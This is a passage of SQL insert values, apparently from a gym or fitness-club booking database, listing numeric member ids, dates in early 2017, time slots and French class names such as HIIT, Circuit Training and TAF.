(9092, 205, 'CTR', '2017-02-23', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9074, 268, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
(9075, 267, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
(9076, 80, 'CTR', '2017-02-23', '12h45', '13h15', 'Circuit Training'),
(9077, 276, 'CTR', '2017-02-22', '18h15', '18h45', 'Circuit Training'),
(9078, 230, 'CTR', '2017-02-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9079, 230, 'CTR', '2017-02-20', '19h15', '19h45', 'HIIT Partie 1 (avec cardio)'),
(9080, 230, 'CTR', '2017-02-23', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9086, 132, 'CTR', '2017-02-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9088, 241, 'CTR', '2017-02-22', '19h ', '19h30', 'Circuit training'),
(9090, 193, 'CTR', '2017-02-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9091, 193, 'CTR', '2017-02-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9093, 48, 'CTR', '2017-02-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9094, 48, 'CTR', '2017-02-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9095, 263, 'CTR', '2017-02-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9096, 263, 'CTR', '2017-02-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9138, 264, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9098, 188, 'CTR', '2017-02-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9140, 140, 'CTR', '2017-03-01', '18h15', '18h45', 'Circuit Training'),
(9139, 264, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9101, 231, 'CTR', '2017-02-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9102, 258, 'CTR', '2017-02-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9103, 258, 'CTR', '2017-02-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9137, 273, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9136, 273, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9106, 230, 'CTR', '2017-02-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9107, 230, 'CTR', '2017-02-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9108, 138, 'CTR', '2017-02-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9109, 138, 'CTR', '2017-02-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9110, 180, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9111, 180, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9134, 272, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9113, 265, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9114, 265, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9135, 272, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9116, 274, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9117, 274, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9118, 80, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9119, 80, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9120, 260, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9121, 260, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9122, 249, 'CTR', '2017-02-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9123, 249, 'CTR', '2017-02-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9124, 213, 'CTR', '2017-02-28', '19h00', '19h30', 'Duo Training'),
(9126, 195, 'CTR', '2017-03-01', '18h15', '18h45', 'Circuit Training'),
(9127, 231, 'CTR', '2017-03-01', '18h15', '18h45', 'Circuit Training'),
(9128, 48, 'CTR', '2017-03-01', '19h ', '19h30', 'Circuit training'),
(9129, 231, 'CTR', '2017-03-01', '19h ', '19h30', 'Circuit training'),
(9130, 241, 'CTR', '2017-03-01', '19h ', '19h30', 'Circuit training'),
(9131, 277, 'CTR', '2017-03-01', '19h45', '20h15', 'Groupe Privé'),
(9132, 90, 'CTR', '2017-03-01', '20h30', '21h00', 'Circuit Training'),
(9133, 188, 'CTR', '2017-03-01', '20h30', '21h00', 'Circuit Training'),
(9141, 210, 'CTR', '2017-03-01', '18h15', '18h45', 'Circuit Training'),
(9143, 196, 'CTR', '2017-03-01', '20h30', '21h00', 'Circuit Training'),
(9144, 205, 'CTR', '2017-03-01', '19h ', '19h30', 'Circuit training'),
(9182, 261, 'CTR', '2017-03-10', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9147, 258, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9148, 258, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9149, 260, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9150, 260, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9151, 249, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9152, 249, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9213, 210, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9155, 132, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9156, 132, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9157, 230, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9158, 230, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9159, 48, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9160, 48, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9161, 263, 'CTR', '2017-03-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9162, 263, 'CTR', '2017-03-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9163, 263, 'CTR', '2017-03-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9164, 231, 'CTR', '2017-03-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9165, 188, 'CTR', '2017-03-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9166, 265, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9167, 265, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9168, 265, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9169, 265, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9170, 180, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9171, 180, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9172, 274, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9173, 274, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9174, 80, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9175, 80, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9176, 275, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9177, 275, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9178, 264, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9179, 264, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9180, 272, 'CTR', '2017-03-06', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9181, 272, 'CTR', '2017-03-06', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9183, 3, 'CTR', '2017-03-10', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9184, 180, 'CTR', '2017-03-10', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9185, 213, 'CTR', '2017-03-07', '19h00', '19h30', 'Duo Training'),
(9186, 48, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9187, 195, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9188, 231, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9189, 140, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9190, 48, 'CTR', '2017-03-08', '19h ', '19h30', 'Circuit training'),
(9191, 241, 'CTR', '2017-03-08', '19h ', '19h30', 'Circuit training'),
(9214, 132, 'CTR', '2017-03-08', '20h30', '21h00', 'Circuit Training'),
(9193, 277, 'CTR', '2017-03-08', '19h45', '20h15', 'Groupe Privé'),
(9195, 90, 'CTR', '2017-03-08', '20h30', '21h00', 'Circuit Training'),
(9196, 188, 'CTR', '2017-03-08', '20h30', '21h00', 'Circuit Training'),
(9215, 31, 'CTR', '2017-03-10', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9295, 263, 'CTR', '2017-03-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9200, 205, 'CTR', '2017-03-06', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9201, 205, 'CTR', '2017-03-06', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9202, 189, 'CTR', '2017-03-09', '12h45', '13h15', 'Circuit Training'),
(9203, 188, 'CTR', '2017-03-09', '12h45', '13h15', 'Circuit Training'),
(9204, 267, 'CTR', '2017-03-09', '12h45', '13h15', 'Circuit Training'),
(9205, 268, 'CTR', '2017-03-09', '12h45', '13h15', 'Circuit Training'),
(9216, 205, 'CTR', '2017-03-09', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9208, 205, 'CTR', '2017-03-09', '12h45', '13h15', 'Circuit Training'),
(9209, 31, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9210, 31, 'CTR', '2017-03-08', '19h ', '19h30', 'Circuit training'),
(9211, 278, 'CTR', '2017-03-08', '18h15', '18h45', 'Circuit Training'),
(9212, 255, 'CTR', '2017-03-06', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9217, 230, 'CTR', '2017-03-09', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9218, 260, 'CTR', '2017-03-10', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9219, 191, 'CTR', '2017-03-09', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9221, 132, 'CTR', '2017-03-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9299, 260, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9223, 263, 'CTR', '2017-03-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9224, 263, 'CTR', '2017-03-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9225, 248, 'CTR', '2017-03-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9226, 231, 'CTR', '2017-03-13', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9300, 249, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9298, 260, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9229, 132, 'CTR', '2017-03-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9230, 258, 'CTR', '2017-03-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9231, 258, 'CTR', '2017-03-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9232, 230, 'CTR', '2017-03-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9233, 230, 'CTR', '2017-03-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9296, 263, 'CTR', '2017-03-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9236, 48, 'CTR', '2017-03-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9237, 48, 'CTR', '2017-03-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9238, 260, 'CTR', '2017-03-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9239, 260, 'CTR', '2017-03-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9240, 205, 'CTR', '2017-03-13', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9241, 205, 'CTR', '2017-03-13', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9242, 80, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9243, 80, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9244, 264, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9245, 264, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9246, 274, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9247, 274, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9248, 272, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9249, 272, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9250, 275, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9251, 275, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9252, 265, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9253, 265, 'CTR', '2017-03-13', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9254, 265, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9255, 265, 'CTR', '2017-03-13', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9256, 213, 'CTR', '2017-03-14', '19h00', '19h30', 'Duo Training'),
(9265, 31, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9258, 48, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9259, 195, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9294, 231, 'CTR', '2017-03-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9261, 140, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9262, 210, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9263, 278, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9264, 205, 'CTR', '2017-03-15', '18h15', '18h45', 'Circuit Training'),
(9266, 48, 'CTR', '2017-03-15', '19h ', '19h30', 'Circuit training'),
(9267, 31, 'CTR', '2017-03-15', '19h ', '19h30', 'Circuit training'),
(9269, 277, 'CTR', '2017-03-15', '19h45', '20h15', 'Groupe Privé'),
(9270, 188, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9271, 196, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9272, 132, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9273, 173, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9274, 247, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9275, 247, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9276, 90, 'CTR', '2017-03-15', '20h30', '21h00', 'Circuit Training'),
(9544, 191, 'CTR', '2017-04-20', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9278, 267, 'CTR', '2017-03-16', '12h45', '13h15', 'Circuit Training'),
(9279, 268, 'CTR', '2017-03-16', '12h45', '13h15', 'Circuit Training'),
(9280, 205, 'CTR', '2017-03-16', '12h45', '13h15', 'Circuit Training'),
(9281, 189, 'CTR', '2017-03-16', '12h45', '13h15', 'Circuit Training'),
(9291, 224, 'CTR', '2017-03-16', '12h45', '13h15', 'Circuit Training'),
(9283, 188, 'CTR', '2017-03-16', '12h45', '13h15', 'Circuit Training'),
(9284, 3, 'CTR', '2017-03-17', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9285, 261, 'CTR', '2017-03-17', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9293, 248, 'CTR', '2017-03-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9287, 48, 'CTR', '2017-03-17', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9288, 31, 'CTR', '2017-03-17', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9289, 195, 'CTR', '2017-03-17', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9356, 191, 'CTR', '2017-03-23', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9297, 188, 'CTR', '2017-03-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9301, 249, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9302, 230, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9303, 230, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9304, 48, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9305, 48, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9306, 205, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9307, 205, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9308, 258, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9309, 258, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9310, 256, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9311, 256, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9312, 180, 'CTR', '2017-03-20', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9313, 180, 'CTR', '2017-03-20', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9314, 80, 'CTR', '2017-03-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9315, 80, 'CTR', '2017-03-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9316, 274, 'CTR', '2017-03-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9317, 274, 'CTR', '2017-03-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9321, 275, 'CTR', '2017-03-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9319, 265, 'CTR', '2017-03-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9320, 265, 'CTR', '2017-03-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9322, 275, 'CTR', '2017-03-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9408, 248, 'CTR', '2017-04-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9409, 255, 'CTR', '2017-04-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9325, 265, 'CTR', '2017-03-20', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9326, 265, 'CTR', '2017-03-20', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9404, 213, 'CTR', '2017-03-28', '19h00', '19h30', 'Duo Training'),
(9405, 193, 'CTR', '2017-03-29', '18h15', '18h45', 'Circuit Training'),
(9329, 205, 'CTR', '2017-03-17', '10h00', '10h45', 'Rattrapage CAF 17/3'),
(9330, 191, 'CTR', '2017-03-17', '10h00', '10h45', 'Rattrapage CAF 17/3'),
(9331, 192, 'CTR', '2017-03-17', '10h00', '10h45', 'Rattrapage CAF 17/3'),
(9332, 230, 'CTR', '2017-03-17', '10h00', '10h45', 'Rattrapage CAF 17/3'),
(9333, 48, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9334, 31, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9335, 195, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9336, 278, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9337, 231, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9338, 241, 'CTR', '2017-03-22', '19h ', '19h30', 'Circuit training'),
(9339, 48, 'CTR', '2017-03-22', '19h ', '19h30', 'Circuit training'),
(9340, 31, 'CTR', '2017-03-22', '19h ', '19h30', 'Circuit training'),
(9341, 277, 'CTR', '2017-03-22', '19h45', '20h15', 'Groupe Privé'),
(9342, 90, 'CTR', '2017-03-22', '20h30', '21h00', 'Circuit Training'),
(9343, 173, 'CTR', '2017-03-22', '20h30', '21h00', 'Circuit Training'),
(9344, 247, 'CTR', '2017-03-22', '20h30', '21h00', 'Circuit Training'),
(9346, 188, 'CTR', '2017-03-22', '20h30', '21h00', 'Circuit Training'),
(9347, 255, 'CTR', '2017-03-20', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9348, 80, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9349, 210, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9350, 193, 'CTR', '2017-03-22', '18h15', '18h45', 'Circuit Training'),
(9370, 255, 'CTR', '2017-03-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9353, 132, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9354, 132, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9355, 140, 'CTR', '2017-03-23', '12h45', '13h15', 'Circuit Training'),
(9357, 205, 'CTR', '2017-03-23', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(9358, 205, 'CTR', '2017-03-23', '12h45', '13h15', 'Circuit Training'),
(9359, 189, 'CTR', '2017-03-23', '12h45', '13h15', 'Circuit Training'),
(9360, 188, 'CTR', '2017-03-23', '12h45', '13h15', 'Circuit Training'),
(9361, 31, 'CTR', '2017-03-24', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9368, 48, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9363, 261, 'CTR', '2017-03-24', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9364, 3, 'CTR', '2017-03-24', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9365, 180, 'CTR', '2017-03-24', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9366, 265, 'CTR', '2017-03-24', '18h30', '19h30', 'Train with me (Entraine toi avec moi)'),
(9410, 205, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9369, 48, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9406, 263, 'CTR', '2017-04-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9372, 263, 'CTR', '2017-03-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9373, 248, 'CTR', '2017-03-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9374, 231, 'CTR', '2017-03-27', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9407, 231, 'CTR', '2017-04-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(9376, 249, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9377, 249, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9378, 260, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9379, 260, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9380, 258, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9381, 258, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9382, 230, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9383, 230, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9384, 205, 'CTR', '2017-03-27', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9385, 205, 'CTR', '2017-03-27', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9386, 266, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9387, 266, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9427, 265, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9426, 265, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9390, 218, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9391, 218, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9392, 265, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9393, 265, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9394, 265, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9395, 265, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9396, 272, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9397, 272, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9398, 275, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9399, 275, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9400, 264, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9401, 264, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9402, 273, 'CTR', '2017-03-27', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9403, 273, 'CTR', '2017-03-27', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(9411, 205, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9412, 260, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9413, 260, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9414, 258, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9415, 258, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9416, 132, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9417, 132, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9418, 249, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9419, 249, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9420, 256, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9421, 256, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9422, 48, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9423, 48, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9424, 230, 'CTR', '2017-04-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(9425, 230, 'CTR', '2017-04-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(9428, 265, 'CTR', '2017-04-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(9429, 265, 'CTR', '2017-04-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
